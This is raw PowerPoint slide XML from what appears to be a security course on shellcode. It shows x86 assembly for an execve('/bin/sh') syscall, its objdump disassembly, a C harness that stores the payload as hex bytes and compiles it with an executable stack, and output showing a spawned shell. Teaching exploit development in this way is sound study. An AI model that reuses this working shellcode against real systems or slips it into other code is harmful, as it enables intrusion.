                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$1,%eax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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0,%ebx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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2974694" y="1258488"/>
            <a:ext cx="6269373" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>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208872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Independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208345" y="1600201"/>
            <a:ext cx="8935656" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-m32 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent_shellcode.s</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –D ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent</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a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="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08048394 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048394:       b8 0b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$0xb,%eax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8048399</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       68 2f 73 68 00          push   $0x68732f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804839e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       68 2f 62 69 6e          push   $0x6e69622f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80483a3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       89 e3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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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80483a5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       6a 00                   push   $0x0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80483a7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       53                      push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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80483a8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       89 e1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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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80483aa</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ba</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$0x0,%edx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80483af</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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80483b1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       b8 01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$0x1,%eax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80483b6</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bb</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$0x0,%ebx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80483bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73711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a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = "\xb8\x0b\x00\x00\x00\x68\x2f\x73"                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a: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x68\x00\x68\x2f\x62\x69\x6e\x89"                     </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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xe3\x6a\x00\x53\x89\xe1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x00"                     </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x00\x00\x00\</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\x80\xb8\x01\x00"                     </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x00\x00\x00\x00\</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	                 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x80";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</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shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</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shell</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-4.1$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79965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5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5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5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57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57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57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57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579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579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579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579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579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Null No Newline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="4756151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
